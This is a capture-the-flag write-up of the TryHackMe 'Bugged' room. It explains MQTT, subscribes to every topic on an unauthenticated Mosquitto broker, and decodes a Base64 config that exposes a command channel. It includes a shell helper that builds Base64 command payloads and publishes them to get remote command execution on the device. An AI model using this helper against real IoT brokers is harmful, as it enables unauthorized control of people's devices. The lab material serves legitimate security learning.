We covered working with Internet of Things (IoT) devices, went over the MQTT protocol, demonstrated the publisher/subscriber model and achieved remote code execution (RCE) on the device. This was part of the TryHackMe room Bugged.

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

Understanding the Setup

I explained that John's smart home appliance is most likely talking to his smartphone or computer. That communication goes over the network: the appliance is joined to John's home Wi-Fi and runs a network service for sending and receiving data (readings such as temperature or movement). My first goal was to identify the port that service was listening on.

Discovering the Protocol and Architecture

An Nmap scan showed TCP port 1883 open, with the service identified as Mosquitto (version 2.0.14), an MQTT broker. MQTT is a lightweight publish/subscribe messaging protocol for machine-to-machine communication, designed for resource-constrained devices and low-bandwidth or unreliable networks, which is why it is so common in IoT products. Port 1883 is the default for plain, unencrypted MQTT (8883 is MQTT over TLS). A broker on 1883 that does not require authentication lets anyone who can reach it read every topic and publish to any of them, which is exactly what the rest of this room exploits.

I detailed the MQTT architecture:

  • Publisher: a client that sends messages (e.g., the smart home appliance publishing sensor readings).
  • Subscriber: a client that receives messages (e.g., John's smartphone or computer).
  • MQTT Broker: the server in the middle. Publishers and subscribers never talk to each other directly; the broker accepts every published message and forwards it to every client subscribed to a matching topic. Both publisher and subscriber are simply clients of the broker.
  • Topics: the named channels that messages are published on, used to label what is being reported (e.g., "lights", "camera", "temperature"). Topic names are hierarchical strings separated by slashes (home/temperature), and subscribers subscribe to the topics they care about, with wildcards if they want several at once.
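The round trip this architecture describes, as an added example that is not part of the original write-up: a throwaway Mosquitto broker on localhost, a subscriber on a wildcard filter and a publisher sending two readings, plus a plain-sh implementation of the MQTT topic-filter matching rules (+, #, and the $-prefix exclusion) that a broker applies when deciding who receives a message. The port number, topic names and readings are made up for the demo; the live part needs the mosquitto, mosquitto_sub and mosquitto_pub binaries and only runs when the script is invoked as `sh script.sh demo`.

```shell
#!/bin/sh
# Added example (not from the original write-up): MQTT topic-filter
# matching in plain sh, plus a local publisher -> broker -> subscriber
# round trip.  Port, topics and readings are constructed for the demo.

# topic_matches FILTER TOPIC
# Returns 0 if FILTER matches TOPIC under the MQTT 3.1.1 rules:
#   '+' matches exactly one level, '#' matches every remaining level
#   (including none, so "home/#" also matches "home"), and wildcards
#   never match topics starting with '$' (so "#" does not expose the
#   broker's $SYS/... statistics; subscribe to '$SYS/#' for those).
topic_matches() {
    filter=$1
    topic=$2
    # $-prefixed topics are only matched by filters that also start with $
    case "$topic" in
        '$'*) case "$filter" in '$'*) ;; *) return 1 ;; esac ;;
    esac
    f_rest=$filter
    t_rest=$topic
    while :; do
        f_lvl=${f_rest%%/*}
        t_lvl=${t_rest%%/*}
        [ "$f_lvl" = "#" ] && return 0            # '#' swallows the rest
        if [ "$f_lvl" != "+" ] && [ "$f_lvl" != "$t_lvl" ]; then
            return 1                                # literal level differs
        fi
        f_more=0; t_more=0
        case "$f_rest" in */*) f_more=1 ;; esac
        case "$t_rest" in */*) t_more=1 ;; esac
        if [ "$f_more" -eq 0 ] && [ "$t_more" -eq 0 ]; then
            return 0                                # both exhausted together
        fi
        if [ "$f_more" -ne "$t_more" ]; then
            # one side ran out: only a trailing "/#" on the filter may match
            [ "$f_more" -eq 1 ] && [ "${f_rest#*/}" = "#" ] && return 0
            return 1
        fi
        f_rest=${f_rest#*/}
        t_rest=${t_rest#*/}
    done
}

# mqtt_demo: start a broker on a spare port, subscribe to everything under
# home/ (-v prints "topic payload", -W 3 quits after 3 s), publish two
# readings as the "appliance" would, then shut the broker down.
mqtt_demo() {
    port=18830
    mosquitto -p "$port" >/dev/null 2>&1 &
    broker=$!
    sleep 1
    mosquitto_sub -h 127.0.0.1 -p "$port" -v -t 'home/#' -W 3 &   # John's phone
    sub=$!
    sleep 1
    mosquitto_pub -h 127.0.0.1 -p "$port" -t home/temperature -m '21.5'   # appliance
    mosquitto_pub -h 127.0.0.1 -p "$port" -t home/motion -m 'detected'
    wait "$sub"
    kill "$broker"
}

if [ "${1:-}" = demo ]; then
    mqtt_demo
fi
```

With the demo running, the subscriber prints `home/temperature 21.5` and `home/motion detected`, one line per forwarded message, and nothing for topics outside home/. The matcher is what the later wildcard subscription relies on: a single `#` reaches every application topic but, by design, not the broker's `$SYS` tree.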

Investigating the “Weird Traffic”

The "weird traffic" was the stream of messages and topics exchanged between the appliance (publisher) and John's device (subscriber) through the MQTT broker. To see those messages I needed to play both roles myself: subscribe the way John's device does, and publish the way the appliance does. The broker in this scenario was the Mosquitto instance running on the appliance; the clients I used to talk to it were mosquitto_sub (subscribe) and mosquitto_pub (publish), which ship in the mosquitto-clients package.

Using the Mosquitto Clients

I demonstrated how to use the mosquitto_sub client program. Key options included:

  • -h or --host: the MQTT host to connect to (the IP address of the smart appliance). -p or --port overrides the default port of 1883.
  • -t: the MQTT topic (or topic filter) to subscribe to. Adding -v prints the topic name in front of each payload, which matters with wildcard subscriptions because otherwise you cannot tell which topic a message arrived on.

To see every topic, I subscribed with the pound character (#), MQTT's multi-level wildcard. It has to be quoted on the command line ("#"), since an unquoted # starts a shell comment, and by design it does not match the broker's internal $SYS/... topics, which need a separate $SYS/# subscription. Among the traffic that came back, one topic carried a message that was clearly Base64 encoded. Decoding it with CyberChef (base64 -d on the command line does the same) revealed a JSON structure with an id, a "registered_commands" array (help, CMD, sys), a publisher topic (pub_topic) and a subscriber topic (sub_topic).

Simulating Communication and Executing Commands

My next step was to publish to the discovered pub_topic while listening on the corresponding sub_topic. At first I used mosquitto_sub for both sides, which cannot work: mosquitto_sub only subscribes. Publishing needs mosquitto_pub. (The pub_topic and sub_topic names come from the decoded configuration and are written from one party's point of view, so if nothing ever comes back on the topic you are listening to, try swapping the two.)

When I published a test message, the reply on the subscriber topic was another Base64 string. Decoded, it said "invalid message format" and helpfully gave the expected format: {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"}.

To execute commands, I needed to:

  1. Use the id from the decoded configuration message as "id".
  2. Set "CMD" to CMD, one of the registered commands, which is the one that runs a system command.
  3. Set "ARG" to the system command I wanted to run (e.g., ls).
  4. Base64 encode the whole JSON payload.
  5. Start mosquitto_sub on the subscriber topic first, then publish the Base64 string to the publisher topic with mosquitto_pub, passing the message with the -m flag. Starting the subscriber first matters: with a default clean session the broker does not queue messages for a client that is not yet connected, so a reply sent before the subscriber is up is simply lost.

The response to ls was another Base64 string; decoded, it was the file listing, which included a flag file. I then repeated the process with cat flag.txt as the argument to read the flag.
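The request/response exchange from steps 1 to 5, as an added example that is not the write-up's own commands: the JSON construction and Base64 steps live in small shell functions, so the payload can be inspected before anything is sent, and run_remote_cmd wires them to mosquitto_sub and mosquitto_pub in the order that matters, subscriber first. The broker address, device id and topic names are placeholders to be replaced with the values from the decoded configuration message; the JSON key names follow the format string quoted above, and pub_topic/sub_topic are used the way the write-up uses them (publish to the former, listen on the latter).

```shell
#!/bin/sh
# Added example (not the write-up's own commands): build the Base64 command
# payload, publish it, and decode the device's Base64 reply.
# All four values below are placeholders; take the real ones from the
# Nmap scan and the decoded JSON configuration message.
BROKER=${BROKER:-10.10.10.10}           # appliance IP (placeholder)
DEVICE_ID=${DEVICE_ID:-PLACEHOLDER-ID}  # "id" field of the decoded config
PUB_TOPIC=${PUB_TOPIC:-example/pub}     # "pub_topic": where we publish
SUB_TOPIC=${SUB_TOPIC:-example/sub}     # "sub_topic": where the reply arrives

# b64d STRING: decode Base64 (the command-line equivalent of the CyberChef
# "From Base64" step; GNU and current BSD/macOS base64 both accept -d).
b64d() {
    printf '%s' "$1" | base64 -d
}

# build_cmd_payload ID COMMAND...: print the one-line Base64 of
#   {"id": "ID", "CMD": "CMD", "ARG": "COMMAND..."}
# "CMD" is the registered command that runs a shell command on the device;
# backslashes and double quotes in the argument are escaped so the JSON
# stays valid. tr strips the newlines base64 inserts every 76 characters,
# because the message has to be a single Base64 string.
build_cmd_payload() {
    id=$1
    shift
    arg=$(printf '%s' "$*" | sed 's/\\/\\\\/g; s/"/\\"/g')
    printf '{"id": "%s", "CMD": "CMD", "ARG": "%s"}' "$id" "$arg" | base64 | tr -d '\n'
}

# run_remote_cmd COMMAND...: send a command and print the decoded reply.
# The subscriber is started first and given a second to connect: with a
# default clean session the broker does not queue messages for a client
# that is not yet connected, so publishing first can lose the reply.
# -C 1 makes mosquitto_sub exit after one message, -W 10 after 10 seconds.
run_remote_cmd() {
    payload=$(build_cmd_payload "$DEVICE_ID" "$@")
    reply_file=$(mktemp)
    mosquitto_sub -h "$BROKER" -t "$SUB_TOPIC" -C 1 -W 10 >"$reply_file" &
    sub=$!
    sleep 1
    mosquitto_pub -h "$BROKER" -t "$PUB_TOPIC" -m "$payload"
    wait "$sub"
    b64d "$(cat "$reply_file")"
    echo
    rm -f "$reply_file"
}

# Usage (needs network reachability to the broker):
#   run_remote_cmd ls
#   run_remote_cmd cat flag.txt
```

Run `build_cmd_payload "$DEVICE_ID" ls | base64 -d` first to confirm the JSON looks exactly like the format the device asked for; a stray newline or unescaped quote in the payload is the usual reason for another "invalid message format" reply.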

Conclusion

I concluded that this was a good learning experience and a starting point for IoT penetration testing. Understanding the MQTT protocol, the publisher/subscriber architecture and the role of the broker is crucial. By reading the device's configuration off an open topic and using the command it had registered, I was able to execute arbitrary system commands on the IoT device. The underlying weaknesses are the usual ones for IoT: an unauthenticated broker reachable on the network, a configuration message that discloses the control topics to anyone who subscribes, and a device that executes whatever command arrives on them.

Technical Commands Used on the Terminal

  1. Display help for mosquitto_sub:
     mosquitto_sub --help
  2. Subscribe to all topics on the host:
     mosquitto_sub -h [IP_ADDRESS] -t "#"
  3. Publish a test message to the publisher topic (the corrected usage, with mosquitto_pub rather than mosquitto_sub):
     mosquitto_pub -h [IP_ADDRESS] -t "[PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -m "test"
  4. Publish the crafted Base64 command payload to the publisher topic, with mosquitto_sub listening on the subscriber topic in another terminal:
     mosquitto_pub -h [IP_ADDRESS] -t "[PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -m "[BASE64_ENCODED_COMMAND_PAYLOAD]"
     This was done twice:
     • First with the ls command payload.
     • Second with the cat flag.txt command payload.

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
